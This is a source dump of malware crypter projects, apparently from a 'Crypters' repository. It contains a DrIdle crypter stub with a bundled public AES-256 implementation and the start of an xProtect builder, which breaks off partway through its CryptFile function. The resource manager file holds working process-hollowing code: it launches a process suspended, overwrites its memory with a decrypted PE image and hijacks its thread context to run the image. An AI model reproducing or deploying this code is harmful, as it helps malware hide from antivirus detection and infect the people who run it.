--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/Resource.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/Resource.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/aes256.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #include "stdafx.h"
21 | #include "aes256.h"
22 |
23 | #define F(x) (((x)<<1) ^ ((((x)>>7) & 1) * 0x1b))
24 | #define FD(x) (((x) >> 1) ^ (((x) & 1) ? 0x8d : 0))
25 |
26 | // #define BACK_TO_TABLES
27 | #ifdef BACK_TO_TABLES
28 |
29 | const uint8_t sbox[256] = {
30 | 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5,
31 | 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
32 | 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0,
33 | 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
34 | 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc,
35 | 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
36 | 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a,
37 | 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
38 | 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0,
39 | 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
40 | 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b,
41 | 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
42 | 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85,
43 | 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
44 | 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5,
45 | 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
46 | 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17,
47 | 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
48 | 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88,
49 | 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
50 | 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c,
51 | 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
52 | 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9,
53 | 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
54 | 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6,
55 | 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
56 | 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e,
57 | 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
58 | 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94,
59 | 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
60 | 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68,
61 | 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
62 | };
63 | const uint8_t sboxinv[256] = {
64 | 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38,
65 | 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb,
66 | 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87,
67 | 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb,
68 | 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d,
69 | 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e,
70 | 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2,
71 | 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25,
72 | 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16,
73 | 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92,
74 | 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda,
75 | 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84,
76 | 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a,
77 | 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06,
78 | 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02,
79 | 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b,
80 | 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea,
81 | 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73,
82 | 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85,
83 | 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e,
84 | 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89,
85 | 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b,
86 | 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20,
87 | 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4,
88 | 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31,
89 | 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f,
90 | 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d,
91 | 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef,
92 | 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0,
93 | 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61,
94 | 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26,
95 | 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
96 | };
97 |
98 | #define rj_sbox(x) sbox[(x)]
99 | #define rj_sbox_inv(x) sboxinv[(x)]
100 |
101 | #else /* tableless subroutines */
102 |
103 | /* -------------------------------------------------------------------------- */
104 | uint8_t gf_alog(uint8_t x) // calculate anti-logarithm gen 3
105 | {
106 | uint8_t atb = 1, z;
107 |
108 | while (x--) {z = atb; atb <<= 1; if (z & 0x80) atb^= 0x1b; atb ^= z;}
109 |
110 | return atb;
111 | } /* gf_alog */
112 |
113 | /* -------------------------------------------------------------------------- */
114 | uint8_t gf_log(uint8_t x) // calculate logarithm gen 3
115 | {
116 | uint8_t atb = 1, i = 0, z;
117 |
118 | do {
119 | if (atb == x) break;
120 | z = atb; atb <<= 1; if (z & 0x80) atb^= 0x1b; atb ^= z;
121 | } while (++i > 0);
122 |
123 | return i;
124 | } /* gf_log */
125 |
126 |
127 | /* -------------------------------------------------------------------------- */
128 | uint8_t gf_mulinv(uint8_t x) // calculate multiplicative inverse
129 | {
130 | return (x) ? gf_alog(255 - gf_log(x)) : 0;
131 | } /* gf_mulinv */
132 |
133 | /* -------------------------------------------------------------------------- */
134 | uint8_t rj_sbox(uint8_t x)
135 | {
136 | uint8_t y, sb;
137 |
138 | sb = y = gf_mulinv(x);
139 | y = (y<<1)|(y>>7); sb ^= y; y = (y<<1)|(y>>7); sb ^= y;
140 | y = (y<<1)|(y>>7); sb ^= y; y = (y<<1)|(y>>7); sb ^= y;
141 |
142 | return (sb ^ 0x63);
143 | } /* rj_sbox */
144 |
145 | /* -------------------------------------------------------------------------- */
146 | uint8_t rj_sbox_inv(uint8_t x)
147 | {
148 | uint8_t y, sb;
149 |
150 | y = x ^ 0x63;
151 | sb = y = (y<<1)|(y>>7);
152 | y = (y<<2)|(y>>6); sb ^= y; y = (y<<3)|(y>>5); sb ^= y;
153 |
154 | return gf_mulinv(sb);
155 | } /* rj_sbox_inv */
156 |
157 | #endif
158 |
159 | /* -------------------------------------------------------------------------- */
160 | uint8_t rj_xtime(uint8_t x)
161 | {
162 | return (x & 0x80) ? ((x << 1) ^ 0x1b) : (x << 1);
163 | } /* rj_xtime */
164 |
165 | /* -------------------------------------------------------------------------- */
166 | void aes_subBytes(uint8_t *buf)
167 | {
168 | register uint8_t i = 16;
169 |
170 | while (i--) buf[i] = rj_sbox(buf[i]);
171 | } /* aes_subBytes */
172 |
173 | /* -------------------------------------------------------------------------- */
174 | void aes_subBytes_inv(uint8_t *buf)
175 | {
176 | register uint8_t i = 16;
177 |
178 | while (i--) buf[i] = rj_sbox_inv(buf[i]);
179 | } /* aes_subBytes_inv */
180 |
181 | /* -------------------------------------------------------------------------- */
182 | void aes_addRoundKey(uint8_t *buf, uint8_t *key)
183 | {
184 | register uint8_t i = 16;
185 |
186 | while (i--) buf[i] ^= key[i];
187 | } /* aes_addRoundKey */
188 |
189 | /* -------------------------------------------------------------------------- */
190 | void aes_addRoundKey_cpy(uint8_t *buf, uint8_t *key, uint8_t *cpk)
191 | {
192 | register uint8_t i = 16;
193 |
194 | while (i--) buf[i] ^= (cpk[i] = key[i]), cpk[16+i] = key[16 + i];
195 | } /* aes_addRoundKey_cpy */
196 |
197 |
198 | /* -------------------------------------------------------------------------- */
199 | void aes_shiftRows(uint8_t *buf)
200 | {
201 | register uint8_t i, j; /* to make it potentially parallelable :) */
202 |
203 | i = buf[1]; buf[1] = buf[5]; buf[5] = buf[9]; buf[9] = buf[13]; buf[13] = i;
204 | i = buf[10]; buf[10] = buf[2]; buf[2] = i;
205 | j = buf[3]; buf[3] = buf[15]; buf[15] = buf[11]; buf[11] = buf[7]; buf[7] = j;
206 | j = buf[14]; buf[14] = buf[6]; buf[6] = j;
207 |
208 | } /* aes_shiftRows */
209 |
210 | /* -------------------------------------------------------------------------- */
211 | void aes_shiftRows_inv(uint8_t *buf)
212 | {
213 | register uint8_t i, j; /* same as above :) */
214 |
215 | i = buf[1]; buf[1] = buf[13]; buf[13] = buf[9]; buf[9] = buf[5]; buf[5] = i;
216 | i = buf[2]; buf[2] = buf[10]; buf[10] = i;
217 | j = buf[3]; buf[3] = buf[7]; buf[7] = buf[11]; buf[11] = buf[15]; buf[15] = j;
218 | j = buf[6]; buf[6] = buf[14]; buf[14] = j;
219 |
220 | } /* aes_shiftRows_inv */
221 |
222 | /* -------------------------------------------------------------------------- */
223 | void aes_mixColumns(uint8_t *buf)
224 | {
225 | register uint8_t i, a, b, c, d, e;
226 |
227 | for (i = 0; i < 16; i += 4)
228 | {
229 | a = buf[i]; b = buf[i + 1]; c = buf[i + 2]; d = buf[i + 3];
230 | e = a ^ b ^ c ^ d;
231 | buf[i] ^= e ^ rj_xtime(a^b); buf[i+1] ^= e ^ rj_xtime(b^c);
232 | buf[i+2] ^= e ^ rj_xtime(c^d); buf[i+3] ^= e ^ rj_xtime(d^a);
233 | }
234 | } /* aes_mixColumns */
235 |
236 | /* -------------------------------------------------------------------------- */
237 | void aes_mixColumns_inv(uint8_t *buf)
238 | {
239 | register uint8_t i, a, b, c, d, e, x, y, z;
240 |
241 | for (i = 0; i < 16; i += 4)
242 | {
243 | a = buf[i]; b = buf[i + 1]; c = buf[i + 2]; d = buf[i + 3];
244 | e = a ^ b ^ c ^ d;
245 | z = rj_xtime(e);
246 | x = e ^ rj_xtime(rj_xtime(z^a^c)); y = e ^ rj_xtime(rj_xtime(z^b^d));
247 | buf[i] ^= x ^ rj_xtime(a^b); buf[i+1] ^= y ^ rj_xtime(b^c);
248 | buf[i+2] ^= x ^ rj_xtime(c^d); buf[i+3] ^= y ^ rj_xtime(d^a);
249 | }
250 | } /* aes_mixColumns_inv */
251 |
252 | /* -------------------------------------------------------------------------- */
253 | void aes_expandEncKey(uint8_t *k, uint8_t *rc)
254 | {
255 | register uint8_t i;
256 |
257 | k[0] ^= rj_sbox(k[29]) ^ (*rc);
258 | k[1] ^= rj_sbox(k[30]);
259 | k[2] ^= rj_sbox(k[31]);
260 | k[3] ^= rj_sbox(k[28]);
261 | *rc = F( *rc);
262 |
263 | for(i = 4; i < 16; i += 4) k[i] ^= k[i-4], k[i+1] ^= k[i-3],
264 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
265 | k[16] ^= rj_sbox(k[12]);
266 | k[17] ^= rj_sbox(k[13]);
267 | k[18] ^= rj_sbox(k[14]);
268 | k[19] ^= rj_sbox(k[15]);
269 |
270 | for(i = 20; i < 32; i += 4) k[i] ^= k[i-4], k[i+1] ^= k[i-3],
271 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
272 |
273 | } /* aes_expandEncKey */
274 |
275 | /* -------------------------------------------------------------------------- */
276 | void aes_expandDecKey(uint8_t *k, uint8_t *rc)
277 | {
278 | uint8_t i;
279 |
280 | for(i = 28; i > 16; i -= 4) k[i+0] ^= k[i-4], k[i+1] ^= k[i-3],
281 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
282 |
283 | k[16] ^= rj_sbox(k[12]);
284 | k[17] ^= rj_sbox(k[13]);
285 | k[18] ^= rj_sbox(k[14]);
286 | k[19] ^= rj_sbox(k[15]);
287 |
288 | for(i = 12; i > 0; i -= 4) k[i+0] ^= k[i-4], k[i+1] ^= k[i-3],
289 | k[i+2] ^= k[i-2], k[i+3] ^= k[i-1];
290 |
291 | *rc = FD(*rc);
292 | k[0] ^= rj_sbox(k[29]) ^ (*rc);
293 | k[1] ^= rj_sbox(k[30]);
294 | k[2] ^= rj_sbox(k[31]);
295 | k[3] ^= rj_sbox(k[28]);
296 | } /* aes_expandDecKey */
297 |
298 |
299 | /* -------------------------------------------------------------------------- */
300 | void aes256_init(aes256_context *ctx, uint8_t *k)
301 | {
302 | uint8_t rcon = 1;
303 | register uint8_t i;
304 |
305 | for (i = 0; i < sizeof(ctx->key); i++) ctx->enckey[i] = ctx->deckey[i] = k[i];
306 | for (i = 8;--i;) aes_expandEncKey(ctx->deckey, &rcon);
307 | } /* aes256_init */
308 |
309 | /* -------------------------------------------------------------------------- */
310 | void aes256_done(aes256_context *ctx)
311 | {
312 | register uint8_t i;
313 |
314 | for (i = 0; i < sizeof(ctx->key); i++)
315 | ctx->key[i] = ctx->enckey[i] = ctx->deckey[i] = 0;
316 | } /* aes256_done */
317 |
318 | /* -------------------------------------------------------------------------- */
319 | void aes256_encrypt_ecb(aes256_context *ctx, uint8_t *buf)
320 | {
321 | uint8_t i, rcon;
322 |
323 | aes_addRoundKey_cpy(buf, ctx->enckey, ctx->key);
324 | for(i = 1, rcon = 1; i < 14; ++i)
325 | {
326 | aes_subBytes(buf);
327 | aes_shiftRows(buf);
328 | aes_mixColumns(buf);
329 | if( i & 1 ) aes_addRoundKey( buf, &ctx->key[16]);
330 | else aes_expandEncKey(ctx->key, &rcon), aes_addRoundKey(buf, ctx->key);
331 | }
332 | aes_subBytes(buf);
333 | aes_shiftRows(buf);
334 | aes_expandEncKey(ctx->key, &rcon);
335 | aes_addRoundKey(buf, ctx->key);
336 | } /* aes256_encrypt */
337 |
338 | /* -------------------------------------------------------------------------- */
339 | void aes256_decrypt_ecb(aes256_context *ctx, uint8_t *buf)
340 | {
341 | uint8_t i, rcon;
342 |
343 | aes_addRoundKey_cpy(buf, ctx->deckey, ctx->key);
344 | aes_shiftRows_inv(buf);
345 | aes_subBytes_inv(buf);
346 |
347 | for (i = 14, rcon = 0x80; --i;)
348 | {
349 | if( ( i & 1 ) )
350 | {
351 | aes_expandDecKey(ctx->key, &rcon);
352 | aes_addRoundKey(buf, &ctx->key[16]);
353 | }
354 | else aes_addRoundKey(buf, ctx->key);
355 | aes_mixColumns_inv(buf);
356 | aes_shiftRows_inv(buf);
357 | aes_subBytes_inv(buf);
358 | }
359 | aes_addRoundKey( buf, ctx->key);
360 | } /* aes256_decrypt */
361 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/aes256.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #ifndef uint8_t
21 | #define uint8_t unsigned char
22 | #endif
23 |
24 | #ifdef __cplusplus
25 | extern "C" {
26 | #endif
27 |
28 | typedef struct {
29 | uint8_t key[32];
30 | uint8_t enckey[32];
31 | uint8_t deckey[32];
32 | } aes256_context;
33 |
34 |
35 | void aes256_init(aes256_context *, uint8_t * /* key */);
36 | void aes256_done(aes256_context *);
37 | void aes256_encrypt_ecb(aes256_context *, uint8_t * /* plaintext */);
38 | void aes256_decrypt_ecb(aes256_context *, uint8_t * /* cipertext */);
39 |
40 | #ifdef __cplusplus
41 | }
42 | #endif
43 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/resourcemanager.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "Windows.h"
3 | #include "resourcemanager.h"
4 |
5 | void ResourceManager::RunFromMemory(unsigned char* pImage,char* pPath)
6 | {
7 | DWORD dwWritten = 0;
8 | DWORD dwHeader = 0;
9 | DWORD dwImageSize = 0;
10 | DWORD dwSectionCount = 0;
11 | DWORD dwSectionSize = 0;
12 | DWORD firstSection = 0;
13 | DWORD previousProtection = 0;
14 | DWORD jmpSize = 0;
15 |
16 | IMAGE_NT_HEADERS INH;
17 | IMAGE_DOS_HEADER IDH;
18 | IMAGE_SECTION_HEADER Sections[1000];
19 |
20 | PROCESS_INFORMATION peProcessInformation;
21 | STARTUPINFO peStartUpInformation;
22 | CONTEXT pContext;
23 | SECURITY_ATTRIBUTES secAttrib;
24 |
25 | char* pMemory;
26 | char* pFile;
27 | memcpy(&IDH,pImage,sizeof(IDH));
28 | memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));
29 |
30 | dwImageSize = INH.OptionalHeader.SizeOfImage;
31 | pMemory = (char*)malloc(dwImageSize);
32 | memset(pMemory,0,dwImageSize);
33 | pFile = pMemory;
34 |
35 | dwHeader = INH.OptionalHeader.SizeOfHeaders;
36 | firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
37 | memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);
38 |
39 | memcpy(pFile,pImage,dwHeader);
40 |
41 | if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
42 | {
43 | jmpSize = INH.OptionalHeader.SizeOfHeaders;
44 | }
45 | else
46 | {
47 | jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
48 | jmpSize += 1;
49 | jmpSize *= INH.OptionalHeader.SectionAlignment;
50 | }
51 |
52 | pFile = (char*)((DWORD)pFile + jmpSize);
53 |
54 | for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
55 | {
56 | jmpSize = 0;
57 | dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
58 | memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);
59 |
60 | if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
61 | {
62 | jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
63 | }
64 | else
65 | {
66 | jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
67 | jmpSize += 1;
68 | jmpSize *= INH.OptionalHeader.SectionAlignment;
69 | }
70 | pFile = (char*)((DWORD)pFile + jmpSize);
71 | }
72 |
73 |
74 | memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
75 | memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
76 | memset(&pContext,0,sizeof(CONTEXT));
77 |
78 | peStartUpInformation.cb = sizeof(peStartUpInformation);
79 | if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation))
80 | {
81 | pContext.ContextFlags = CONTEXT_FULL;
82 | GetThreadContext(peProcessInformation.hThread,&pContext);
83 | VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
84 | WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
85 | WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
86 | pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
87 | SetThreadContext(peProcessInformation.hThread,&pContext);
88 | //VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
89 | ResumeThread(peProcessInformation.hThread);
90 | }
91 | free(pMemory);
92 | }
93 |
94 | unsigned char* ResourceManager::GetResource(int resourceId, char* resourceString, unsigned long* dwSize) {
95 | HGLOBAL hResData;
96 | HRSRC hResInfo;
97 | unsigned char* pvRes;
98 | HMODULE hModule = GetModuleHandle(NULL);
99 |
100 | if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(resourceId), resourceString)) != NULL) &&
101 | ((hResData = LoadResource(hModule, hResInfo)) != NULL) &&
102 | ((pvRes = (unsigned char *)LockResource(hResData)) != NULL))
103 | {
104 | *dwSize = SizeofResource(hModule, hResInfo);
105 | return pvRes;
106 | }
107 |
108 | *dwSize = 0;
109 | return NULL;
110 | }
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/resourcemanager.h:
--------------------------------------------------------------------------------
1 | class ResourceManager
2 | {
3 | public:
4 | ResourceManager();
5 | virtual ~ResourceManager();
6 |
7 | public:
8 | static void RunFromMemory(unsigned char* pImage,char* pPath);
9 | static unsigned char* GetResource(int resourceId, char* resourceString, unsigned long* dwSize);
10 | };
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/stdafx.cpp
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/stdafx.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/targetver.h
--------------------------------------------------------------------------------
/xProtect Source/build.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #include "stub.h"
5 |
6 | DWORD dwStubCodeBase = 0;
7 | DWORD dwStubCodeSize = 0;
8 | DWORD dwStubDataBase = 0;
9 | DWORD dwStubDataSize = 0;
10 |
11 | BYTE* ReadFileToMem( WCHAR* szFileName, DWORD& dwSize )
12 | {
13 | HANDLE hFile = CreateFile( szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL );
14 |
15 | if ( hFile == INVALID_HANDLE_VALUE )
16 | return 0;
17 |
18 | dwSize = GetFileSize( hFile, NULL );
19 |
20 | if ( !dwSize )
21 | return 0;
22 |
23 | BYTE* pFileBuffer = (BYTE*)VirtualAlloc( NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
24 |
25 | if ( !pFileBuffer )
26 | return 0;
27 |
28 | DWORD dwRead = 0;
29 | ReadFile( hFile, pFileBuffer, dwSize, &dwRead, NULL );
30 | CloseHandle( hFile );
31 |
32 | return pFileBuffer;
33 | }
34 |
35 | void GenerateKey()
36 | {
37 | for ( int i = 0; i < sizeof( bKey ); i++ )
38 | {
39 | bKey[i] = (BYTE)rand();
40 | }
41 | }
42 |
43 | void FixAddress( BYTE* pBase, DWORD dwSize, DWORD dwOldBase, DWORD dwNewBase )
44 | {
45 | for ( int i = (int)pBase; i < (int)( pBase + dwSize ); i++ )
46 | {
47 | if ( *(DWORD*)i >= dwOldBase && *(DWORD*)i < ( dwOldBase + dwSize ) )
48 | {
49 | *(DWORD*)i -= dwOldBase;
50 | *(DWORD*)i += dwNewBase;
51 | }
52 | }
53 | }
54 |
55 | bool GetStubSectionInfo( DWORD_PTR dwCrypterBase )
56 | {
57 | IMAGE_DOS_HEADER* pIDH = (IMAGE_DOS_HEADER*)dwCrypterBase;
58 | if ( pIDH->e_magic != IMAGE_DOS_SIGNATURE )
59 | return false;
60 |
61 | IMAGE_NT_HEADERS* pINH = (IMAGE_NT_HEADERS*)( dwCrypterBase + pIDH->e_lfanew );
62 | if ( pINH->Signature != IMAGE_NT_SIGNATURE )
63 | return false;
64 |
65 | IMAGE_SECTION_HEADER* pISH = IMAGE_FIRST_SECTION( pINH );
66 |
67 | for ( int i = 0; i < pINH->FileHeader.NumberOfSections; i++ )
68 | {
69 | if ( !memcmp( (char*)pISH[i].Name, ".stubc", 8 ) )
70 | {
71 | dwStubCodeBase = dwCrypterBase + pISH[i].VirtualAddress;
72 | dwStubCodeSize = pISH[i].Misc.VirtualSize;
73 | }
74 |
75 | if ( !memcmp( (char*)pISH[i].Name, ".stubd", 8 ) )
76 | {
77 | dwStubDataBase = dwCrypterBase + pISH[i].VirtualAddress;
78 | dwStubDataSize = pISH[i].Misc.VirtualSize;
79 | }
80 | }
81 |
82 | if ( dwStubCodeBase && dwStubCodeSize && dwStubDataBase && dwStubDataSize )
83 | return true;
84 | else
85 | return false;
86 | }
87 |
88 | int CalculateIncreasedSize( int dwIn, int inc_every, int inc_multi )
89 | {
90 | int iRet = 0;
91 |
92 | for ( int i = 0; i < dwIn; i++ )
93 | {
94 | iRet++;
95 |
96 | if ( i % inc_every == 0 )
97 | iRet += inc_multi;
98 | }
99 |
100 | return iRet;
101 | }
102 |
103 | int InFile( BYTE* bIn, BYTE* bOut, DWORD dwSize, int inc_every, int inc_multi )
104 | {
105 | int increased = 0;
106 |
107 | for ( int i = 0; i < dwSize; i++ )
108 | {
109 | *( bOut + increased ) = *( bIn + i );
110 | increased++;
111 |
112 | if ( i % inc_every == 0 )
113 | increased += inc_multi;
114 | }
115 |
116 | return increased;
117 | }
118 |
119 | bool CryptFile( WCHAR* szFilePath )
120 | {
121 | bool bReturn = false;
122 |
